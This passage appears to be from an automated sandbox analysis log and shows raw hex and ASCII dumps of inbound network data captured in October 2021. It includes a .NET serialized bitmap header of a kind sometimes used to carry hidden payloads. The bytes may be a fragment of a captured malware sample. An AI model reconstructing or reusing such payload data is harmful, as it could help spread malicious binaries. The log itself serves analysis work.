00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1941	IN	Data Raw: 0e 3a 8e ce 2b 58 a9 a2 43 96 b3 68 bc c8 98 51 15 9d fa 2c 81 97 10 a3 f3 6a 01 5f e3 c6 ee 3a 78 30 7b 40 d8 8c e8 b1 ab 68 a5 fd 87 ec 5f 14 d5 d4 f3 33 9c 4b e0 10 ef 40 73 d0 1a c8 06 ec a2 a7 fa f9 d2 7c 3a 13 04 89 29 78 36 23 9d 56 c7 a0 80 f6 88 5b 85 76 ca 4f 50 79 54 28 c3 1a 28 23 a5 b9 49 2b fe 0c 24 2a d1 af d5 f7 be 10 ee 9a c1 84 9a 56 c6 5a 9d 7d 5d 78 c4 e9 2e d0 f0 b1 74 c2 f2 f8 5f 4c 3a 9f 83 05 bf a0 3b 1b 31 46 ef 0f 98 61 c0 d3 42 57 3b f7 a0 f4 5f 59 49 c1 b0 e9 a8 84 c0 0c 71 fb a4 51 b4 33 52 7d d8 c6 e2 aa c3 d1 c7 e6 e1 de a4 bc 98 44 28 b1 ae e4 a2 f6 c5 37 92 5d 21 07 fc 83 44 6b 23 9f df 2e 74 7b 61 96 fe 39 e4 8e e3 29 7b 79 f0 ee 1a 6f 88 ec a2 79 48 9c c2 70 32 c0 f6 a2 6a 8e 5d 16 9e 92 4b 3a 18 b3 c7 d8 b1 70 10 6e 71 Data Ascii: :+XChQ,j_:x0{@h_3K@s\|:)x6#V[vOPyT((#I+$*VZ}]x.t_L:;1FaBW;_YIqQ3R}D(7]!Dk#.t{a9){yoyHp2j]K:pnq
2021-10-16 14:53:37 UTC	1957	IN	Data Raw: dd a4 9b 03 03 25 31 35 8d e6 b4 80 09 fc 97 48 2b ed 0a 6c 5b 38 10 5b 14 7e 5f 1e dc 77 34 92 7b 66 13 8c 14 9a 59 4e 0e e7 76 eb 30 08 1c 36 bb e8 78 de e1 3e 0d 62 f7 dd bc 8b 99 17 50 5c 74 fe 92 45 08 fb 2e 27 25 c1 3f 9a a6 70 ee 3c 72 0c e8 30 b9 16 df 5e 18 2b 94 76 12 63 9b 69 2e 80 0a ea d3 5b c6 0e c3 6f 41 74 0e d5 10 46 5f 0b ad 9d 78 62 65 1e 2e 81 6f c8 0d 4d a2 ab 88 7e f6 20 e1 70 f4 28 16 a1 93 c7 67 75 fa d0 4f 4f 56 a2 b5 b7 20 c6 20 b2 b9 63 87 18 4c 1e 8f a7 10 9b da d4 98 31 25 27 b6 00 84 18 f2 11 42 cb 6e 2a e5 c3 40 2d 6f ed a1 8a 84 de a6 b8 6d bd 0e db bb b5 ea d7 5c 63 7f 08 c3 88 34 ff 68 4c 7e 62 c3 a7 f5 51 84 12 dd 5b 74 ce 9b 3e 57 c2 29 90 f8 49 87 a1 4f 26 e4 2f 68 af 39 e1 83 d9 e1 fa 6b cf 57 f1 89 b3 ae 9f d4 2b 88 Data Ascii: %15H+l[8[~_w4{fYNv06x>bP\tE.'%?p<r0^+vci.[oAtF_xbe.oM~ p(guOOV cL1%'Bn*@-om\c4hL~bQ[t>W)IO&/h9kW+
2021-10-16 14:53:37 UTC	1973	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	1989	IN	Data Raw: c5 10 d3 eb 5a 22 6d 3d 98 38 d9 3f 64 f4 7f fc d6 7f 9a 97 94 41 dc ec e2 7d fd 2d 21 92 9b 01 5f 7e e3 f8 86 29 68 c7 bb d6 65 12 a0 d0 f1 b5 70 37 da eb 4d ea 95 46 e2 62 bf 64 58 68 5e b6 29 32 13 9d 66 c2 37 6a 0a 7d b0 0b 9b 7b 29 99 98 ee 54 fd 30 8a d4 19 f6 f5 fb f9 55 c3 28 60 50 63 b0 27 56 cd 7c 25 ee 3c 96 36 0d 73 49 91 b6 36 98 b1 78 ee c3 3e f3 46 64 c5 da 70 9f 80 df a2 f3 fc 78 d3 0f f0 72 c6 4f 54 7a c8 07 8a 0b 71 33 bb 05 b5 70 1d 10 8e b2 ad 85 49 3f 99 54 bf 8f 23 04 9d de 78 03 44 e9 91 7d 4d 2b b7 28 69 2c c6 96 29 19 6f 64 6b 99 99 e9 33 e3 87 0c 42 b1 95 3e 41 3e 85 0b c6 34 2b 62 6a 60 25 47 ef 40 ea 86 78 a5 53 73 8e e8 e5 d6 ec f6 f1 11 5d 0f 74 13 9d ca a5 5d ef 0c c8 87 8b 3c 04 c2 2f 3c fd 71 b0 a7 eb 35 b0 2c e6 b3 ec fe Data Ascii: Z"m=8?dA}-!_~)hep7MFbdXh^)2f7j}{)T0U(`Pc'V\|%<6sI6x>FdpxrOTzq3pI?T#xD}M+(i,)odk3B>A>4+bj`%G@xSs]t]</<q5,
2021-10-16 14:53:37 UTC	2005	IN	Data Raw: 22 17 5b 8b ed d3 64 5e c1 ee a2 d4 da dd 6b 42 d8 1f 94 39 63 41 16 36 9f 06 f6 40 8d 32 6c 47 36 bd 6e f8 e2 86 c0 9e b5 fe 17 34 d2 67 82 a6 62 4c 85 f5 08 fe 28 4a f5 71 f0 fb 26 e4 df 26 b4 2f 57 ed 16 6b f2 9c 83 8a df 0f 1e c8 f7 76 ce 68 df 16 f7 6d 34 61 cb 7b c5 63 c2 e4 73 37 7c ac 0e a9 cb 43 86 85 1a d8 b5 c8 e0 36 54 be f3 7f ae a4 84 19 cd da d1 13 a6 d4 50 e8 4b 01 0a 1e da 6e 64 c2 f9 63 83 79 47 af de 63 3c 9e 6c 7d 2f 53 cc a7 7e 07 2c 09 fb 48 b9 7b 98 e8 db 65 3c 48 4c 3f 9d e0 3e 1a 04 16 f3 8f 7f 74 4d 41 9e 6a fe ae cd 1e 97 92 39 7c ae 68 64 d1 7a 6c 51 77 43 a8 89 d6 66 3f 29 9a 3d d7 81 43 d1 89 18 38 91 9d fb e9 87 b9 d4 a7 95 e5 01 00 ad 9e 78 4e 17 39 68 d6 3b 3c a3 8f bc c8 46 39 a7 b0 fd 2d ed 81 b0 43 c5 a4 1f 74 96 98 a6 Data Ascii: "[d^kB9cA6@2lG6n4gbL(Jq&&/Wkvhm4a{cs7\|C6TPKndcyGc<l}/S~,H{e<HL?>tMAj9\|hdzlQwCf?)=C8xN9h;<F9-Ct
2021-10-16 14:53:37 UTC	2021	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4a 7f 2d ee 3d 09 87 7b 24 ec d2 fe ac 14 e8 e7 12 83 97 82 12 b9 af 4b 8d e4 c9 8f a3 3b 25 3b eb 20 33 f6 1b 0e d5 6b 56 72 e0 45 52 31 83 36 92 da e6 24 80 ed cd ea b9 c7 81 99 b3 6c bc c0 93 c6 0c fc c9 e8 bc b1 58 c5 d3 ca cd 35 e8 29 17 9d 11 3b 6e 37 67 07 0a af 77 5e 88 2c b5 27 1e fd 49 b4 87 4f c8 4c bb d2 21 76 96 ea 0e 62 5c 51 71 2d ea 2b 36 9d e7 16 e2 11 f6 53 72 86 29 4f 25 f9 af 9a 7f ed 46 b2 98 30 1a ec a6 18 fc c9 10 8a 9e 47 41 dd d0 36 c1 35 b4 74 5f f1 2d 7f 34 29 54 39 23 39 3e 7e d0 1f 97 fc 7f 5c 84 82 f3 68 73 59 89 5a 17 67 e3 97 2d 40 c4 44 e3 c4 89 8c 27 34 3f a1 Data Ascii: J-={$K;%; 3kVrER16$lX5);n7gw^,'IOL!vb\Qq-+6Sr)O%F0GA65t_-4)T9#9>~\hsYZg-@D'4?
2021-10-16 14:53:37 UTC	2037	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2053	IN	Data Raw: f0 a8 17 0c 2c 9c 74 c8 36 e9 c7 aa 27 4b 9b 56 3e dd 9a e3 b2 0e 0c 89 3c 2e eb 61 bc 74 19 7a 5e 3a 84 f0 9a 5e 19 43 55 b3 c1 f7 1d d2 64 fa 5c 22 90 c6 dd 68 01 1a 4a 16 9c b9 eb 27 06 48 59 69 3c 81 fc 2f ae dc b9 23 e5 17 b2 f0 29 91 d5 05 85 55 98 22 c0 97 73 8e 30 fb 55 b3 a1 89 9e dc 2c eb d6 a0 50 99 f5 07 05 7f d6 6a 2b ee f1 f3 73 69 d8 fc 77 f5 08 80 90 22 d7 e1 de 6c 2d ad 59 18 35 3b 45 fa 49 eb d9 fe 94 00 76 f3 a9 94 7c 95 e5 3e 24 ac 6d d5 08 9d 0c ab ba 0d f6 3c c4 07 c3 1f d8 a6 da ba e7 b2 83 94 d0 df 6a 67 37 d3 5f 75 f8 10 0c 7e ee cd cd 0b f4 23 5b 10 9a f9 b1 e7 0c 98 ff 01 6b c7 7e ac 0e a1 08 39 ae bb 39 6b e5 c6 f3 a7 c0 30 9d 30 24 5e 08 ca d0 47 d5 96 89 9b 08 c3 17 4d 4c f2 69 1c 5d 4b 28 fa bb d1 25 73 ea 79 e6 d9 b9 25 1d Data Ascii: ,t6'KV><.atz^:^CUd\"hJ'HYi</#)U"s0U,Pj+siw"l-Y5;EIv\|>$m<jg7_u~#[k~99k00$^GMLi]K(%sy%
2021-10-16 14:53:37 UTC	2069	IN	Data Raw: 3c 64 2c af d1 a9 3d e6 78 65 86 e3 de f2 f9 33 6c bc b5 f6 1d 1a d8 57 29 4e 88 3f 8b 72 5b 16 38 36 0e 90 a3 ae a7 46 43 8b a9 40 9d ce 36 40 04 43 ef ca e7 ff 52 26 00 c9 7f 6b 20 f3 73 b7 99 6d a6 e2 ed 49 d9 33 af 8c d7 7a 01 2f 93 37 30 6c 1f b2 58 e4 0b a9 80 78 aa 14 da 45 13 2f 46 b9 b8 dc 0a f1 d7 4d 97 4e c8 4c 98 c5 cf 59 bf 9a da 98 bf 78 91 a2 78 ac d0 94 7d b4 a6 c6 db 8f 98 a3 12 6b 2c 29 fd 57 95 ad d6 f7 b2 47 16 2c c9 e1 ee ad ed e8 c0 d8 b0 2c 3c da 8a c1 f4 99 3a c2 83 87 20 63 3e 00 f0 f7 bc 73 42 b6 81 d8 15 5d e6 4e 25 ec b4 ad 0b 0d e5 da 6e 0d 49 4a fa 50 6e b0 48 ce 39 69 a2 e8 1e 68 2f 1e cb b1 52 b2 2b 88 e1 4f 91 24 f6 31 13 38 89 1e dc 1f eb 5a 49 10 81 cb 9b ce 96 7a 6d 82 a8 f5 62 69 b2 b1 6d 62 f2 fd 82 79 cd bc 14 32 23 Data Ascii: <d,=xe3lW)N?r[86FC@6@CR&k smI3z/70lXxE/FMNLYxx}k,)WG,,<: c>sB]N%nIJPnH9ih/R+O$18ZIzmbimby2#
2021-10-16 14:53:37 UTC	2085	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2101	IN	Data Raw: 70 28 b1 80 28 31 11 4e a7 79 1a fd ad 60 28 2d 90 09 ca f4 e3 ec 1c bc 79 d7 67 a9 54 ac 15 27 72 03 4d c4 61 76 35 c0 0d 0e c3 0e 4d cb 16 71 c1 3a c3 20 86 49 d2 e1 de c6 a6 ca ed 4d 12 2f ac 79 38 b9 95 96 b6 70 37 b7 32 60 4d 61 c3 8d 82 80 ee 5f bc e1 fb 28 f3 15 82 a8 7c fd 01 a1 1a 86 fb 80 29 c6 ee 29 af 30 bb ba 5e 80 e7 f7 98 17 70 75 f7 82 3b 0d ac 3b 6c e0 8c 54 92 8d ed da 5e 30 67 69 54 b1 2f ea 25 02 88 05 9e e6 d3 84 98 d5 75 2e 18 99 e9 9b ce b7 0d 0f 00 00 00 00 88 fa 82 91 13 18 74 8d 7f 42 5e 8d 50 31 b9 2e ae 60 d5 bb f7 16 0e fc ac d9 39 b6 10 aa fd 92 e8 4d fc 7c 29 ea 2d 22 8b d0 be 78 e3 61 40 1d 80 51 97 d6 22 54 66 5a 4c 7c 62 cc 9d a2 36 39 00 38 bc 37 8d 8c fd 4f fd 8f f8 f0 36 bb 5b da 5c 99 bc fb 9b 9c 24 48 63 38 93 39 43 Data Ascii: p((1Ny`(-ygT'rMav5Mq: IM/y8p72`Ma_(\|))0^pu;;lT^0giT/%u.tB^P1.`9M\|)-"xa@Q"TfZL\|b6987O6[\$Hc89C
2021-10-16 14:53:37 UTC	2117	IN	Data Raw: 38 7f f6 15 23 1d 67 d2 3c 77 30 ab 5e cd 5f 1c db 4e b5 17 86 6c 98 a5 60 02 67 66 f9 8d f7 70 73 79 e3 80 4b 28 d5 3d dc 23 f1 5b 3b 1c e0 9f 72 68 13 c6 9e f9 60 c1 69 3a ec ec dd 23 32 d2 26 d8 ac f4 63 07 fe 51 ba 68 0f 0f 45 97 e6 1b df 22 dd 94 7e b7 c4 ef 1a c8 36 c0 0b 7a e0 91 88 7b 32 64 f6 ed 7e 87 68 af 6e 9d 4e eb db 86 c2 b5 18 fc 02 aa 6e 85 42 2e 6d a1 d0 7b cc 55 22 24 a8 ee 40 ca 38 e4 54 27 ea 53 fd 6a 56 cf ab a4 6c e6 dc a2 36 a4 3c 15 31 16 75 90 ad 94 a7 27 8d cc 17 0e 81 a3 cc a1 6e 58 86 38 64 bf c9 66 32 51 9d 2e 2c a4 2a 98 18 a5 f6 80 a3 ab 89 ea 43 01 fa 96 04 dd 29 79 9e 5f 0f 7f e7 67 76 60 af 04 b4 5c ba 7c dc d9 d5 3c ba 09 d7 9b b4 87 a0 f4 32 74 9d 65 89 f7 d0 84 e1 4b 89 03 06 61 2a 77 96 3e fa e6 a7 6e 15 fb d8 2a 6b Data Ascii: 8#g<w0^_Nl`gfpsyK(=#[;rh`i:#2&cQhE"~6z{2d~hnNnB.m{U"$@8T'SjVl6<1u'nX8df2Q.,C)y_gv`\\|<2teKaw>n*k
2021-10-16 14:53:37 UTC	2133	IN	Data Raw: 5b 65 a7 17 87 9b a6 c0 d9 e0 3a 71 49 65 7d f9 0b 17 06 ae 0d fd 52 1d 32 e3 3f 44 6f 02 24 21 fb a4 09 49 65 96 fb 12 b0 7b 37 d2 71 b4 d4 66 59 be 59 e3 dd e1 3e 8a 10 6e 50 15 a2 01 8d 57 16 2e 95 2c bf 35 20 c0 92 29 18 f4 85 78 9c f2 18 3f bf 52 5e 20 7d c4 34 d0 c4 42 79 96 14 73 11 7c 3a b6 da 0c 13 c1 f8 76 6d b3 f5 21 66 7c 48 38 9b c5 90 fc 5a e8 cc 9b b7 bb fd 1a 57 b5 0d 3e e6 92 7f c0 63 b4 50 5c b2 f5 77 f3 05 43 24 7f 60 21 14 d3 02 6c fc c6 3c df cb 0f 51 59 d4 65 36 2d 2f 3b 2e 8b 80 d3 1f ac 88 cd f7 51 98 c9 db 12 6e 12 10 40 f9 d2 b4 d3 58 98 36 70 bf 0d 4e 2a c1 6a ec 13 6a 60 63 0f 70 ba c4 eb 8d c1 7c 42 cb 42 4e d3 51 2a f5 32 d6 25 4c 18 ac 41 aa 2a 60 30 dc 4a c0 86 8e 58 fc 09 61 20 71 d2 09 2f 02 78 fe 00 52 1e b2 71 e8 38 3a Data Ascii: [e:qIe}R2?Do$!Ie{7qfYY>nPW.,5 )x?R^ }4Bys\|:vm!f\|H8ZW>cP\wC$`!l<QYe6-/;.Qn@X6pNjj`cp\|BBNQ2%LA*`0JXa q/xRq8:
2021-10-16 14:53:37 UTC	2149	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2165	IN	Data Raw: 9b 59 60 b4 b6 f0 3e de f9 64 cd 98 94 b4 43 bc 80 69 ac c5 1d b0 44 05 03 f6 a3 8c 4a 8b fc ad 34 3f d2 54 a1 61 f3 68 ad 98 2f 79 db 47 de 30 15 f3 e0 0f ee 54 5a ba 84 0f ee 31 a7 d9 49 2b 69 ea 56 f7 2a d4 ab d4 85 8d 14 81 d2 4f 73 02 2d 02 a1 26 26 cd 61 83 52 d0 ee 4f 51 d5 17 fa 1e 50 07 d3 c8 54 b3 b5 80 3b 27 f4 25 0a cf 20 2a be f7 51 39 e2 5e fa a0 95 97 48 8a ea 82 62 f2 f3 a9 8f a2 e8 a6 df ba d0 19 78 84 3b 9b b6 a3 50 6f 27 fb 36 52 9e 8b f0 0f 8d b7 bd 8e 0e fe 32 fa 53 46 ab 80 6f b4 f1 09 e6 3c 1a 48 61 e2 85 58 e2 ce 76 b7 fb ea ab 23 e2 fb d1 06 a4 91 38 aa f7 ac c8 af 85 25 40 a7 2e ce df 9b 28 3f d1 64 bc b4 04 39 c0 0c d3 2c ac b9 fc 95 ba be a4 77 0b cd c6 b8 88 0e 41 23 81 d9 19 d1 f0 2b 39 94 13 0a 13 62 8d a3 a7 2d 58 3f ca 47 Data Ascii: Y`>dCiDJ4?Tah/yG0TZ1I+iVOs-&&aROQPT;'% Q9^Hbx;Po'6R2SFo<HaXv#8%@.(?d9,wA#+9b-X?G
2021-10-16 14:53:37 UTC	2181	IN	Data Raw: 89 3c 6a 0d bd d3 fb 55 65 19 ba 27 6a 0d 85 e9 77 cd f8 47 08 d7 97 2e d8 25 87 cf 2b 3a 2c 88 6b aa 7e aa c9 72 87 7a 71 a7 fd ec 44 1b af 32 61 81 70 89 88 70 89 d1 ef 45 14 3b 49 f6 49 43 12 c6 85 8a 31 d0 83 7d 0c be bd aa ee 1c e8 a8 04 a8 5a df a6 6b 7f 87 cc 8c 5f 0e 2f da 3d b5 9b c4 b6 2e db ab 09 c4 79 3e b7 fe 29 07 68 76 e1 21 a1 5e 62 11 fa 17 cc 16 c7 3c b4 96 ce a6 04 24 42 1b 6f 0f 25 bf fa 92 ba 60 45 9a fc 1e 8b 99 5f da 54 1d a0 9a ab 9e 16 10 b3 e4 db 28 14 ed 89 6d ca ac 58 c1 ac cb 24 50 19 ec 17 ae 35 46 bf 8a f8 d5 0f 53 d1 1c c7 d3 1a df 66 be 96 d8 ab 97 09 9b 5e e0 f2 78 18 04 86 e2 80 a6 58 00 0f 49 13 bf 46 1a 46 cd 0c a1 89 01 7a c0 31 10 1f 37 f9 76 16 f8 31 9a a7 c4 0d 9d 45 80 0c 2a ea e2 a1 3e 75 a3 0a 90 c3 c0 69 e4 89 Data Ascii: <jUe'jwG.%+:,k~rzqD2appE;IIC1}Zk_/=.y>)hv!^b<$Bo%`E_T(mX$P5FSf^xXIFFz17v1E*>ui
2021-10-16 14:53:37 UTC	2197	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:37 UTC	2213	IN	Data Raw: dd e1 b5 f4 6d ed cb f2 75 93 a3 e9 f4 6b 49 40 e7 9c 09 b5 ae 8d b2 45 7d 61 5d 09 f7 49 44 b6 17 4c ff 4c 95 12 f3 6d 9b 58 ff 46 8a b6 9a d7 56 02 d0 b3 fa c9 0a 29 1e b4 90 ac e4 de 58 d7 72 09 6a b8 a2 16 ce 4d c7 1b c6 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 Data Ascii: mukI@E}a]IDLLmXFV)XrjM@QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapDataBM6(
2021-10-16 14:53:37 UTC	2229	IN	Data Raw: c7 5b 9f 7c 1b 38 10 3a aa 04 af 45 2c 98 30 3c 5b 00 85 66 e4 f0 60 b2 13 6c 0b c0 05 aa 18 5a 49 40 17 08 1e 79 9f 48 07 06 3b f9 34 bf 93 b9 bf ce ac 5a 96 ae 58 b3 7b 8b cb 05 90 48 74 1d 24 83 b1 6a e9 de 25 9a 84 ae 55 f1 62 a7 e6 70 50 fc 04 aa f1 04 a8 66 e4 2c 40 52 ca 1f 8a e7 7e a3 0e b0 d2 5c 42 b8 d4 46 dc 35 c7 34 06 df 92 c5 14 84 9d 29 f4 f1 57 82 4e d5 ae 96 a8 d7 90 b8 72 31 91 59 5f 11 52 5e 1c 34 5c ee d6 ba 09 66 db 5b 8c 44 f4 ad a1 f9 66 4d 3b 26 24 a3 0b 66 d7 32 92 5b fd 3e 9b c4 7d e4 6c 54 4b 38 aa cc 59 a1 2c a5 38 e6 92 5e 0e a5 59 00 a9 de 95 55 65 3e fd 44 ef e5 b0 ea a8 fb 04 2d d1 c8 14 b8 11 a0 7e 8c e6 8d a2 00 74 ad 81 04 71 4d 85 4b 1a 73 c9 4e 32 ad 89 d2 73 9a a3 5b d1 a9 ad 98 0a 81 66 93 27 2e d6 bb 8b 10 ea 8f 0b Data Ascii: [\|8:E,0<[f`lZI@yH;4ZX{Ht$j%UbpPf,@R~\BF54)WNr1Y_R^4\f[DfM;&$f2[>}lTK8Y,8^YUe>D-~tqMKsN2s[f'.
2021-10-16 14:53:37 UTC	2245	IN	Data Raw: 55 11 6f 36 07 6d 3c 84 40 3d 9d 3e 4c ed 8d 98 e1 79 cc 57 12 77 53 6d 9e 1b aa 17 fd 32 de 4d 84 49 eb 33 11 94 88 22 43 1e dd 3e 24 bc 06 28 44 d7 e4 2e 42 c5 c5 95 22 ac 2a 04 34 4c bd 10 fc e2 eb be 7f bd 5c e2 4c 35 c5 1e 42 40 e5 88 00 31 97 b2 8a 77 f6 1b 66 19 f5 4b 42 ec 17 c9 2c 1f c0 c7 d0 ec 1b 72 36 72 af bb 25 22 7c e8 f1 fd d3 fd 55 4f 2e ac f7 f5 16 fc 8e 88 75 20 a0 98 7b 10 5e fc 1e bd 29 95 79 1d 82 a5 19 0c 88 d9 75 8f 2f 4b 33 70 ce ec fa 1c aa 8a 76 91 ba 5f 29 31 d0 3b f6 c9 20 3f fc 58 dd 14 95 46 de e3 cf 03 51 7c 56 4f 16 ca 31 7a 2b f3 18 2e d5 e9 71 d5 95 37 63 23 d8 3f 40 3e dd 4d 06 75 86 09 8b b1 02 74 d0 ba eb 31 0a 15 d5 ce 4e fa 8e bb cf 79 05 f7 00 9a 29 ae 2e bb ea c0 53 57 62 d0 82 eb a2 6a 7e f3 38 40 34 c9 52 e5 78 Data Ascii: Uo6m<@=>LyWwSm2MI3"C>$(D.B"*4L\L5B@1wfKB,r6r%"\|UO.u {^)yu/K3pv_)1; ?XFQ\|VO1z+.q7c#?@>Mut1Ny).SWbj~8@4Rx
2021-10-16 14:53:37 UTC	2261	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
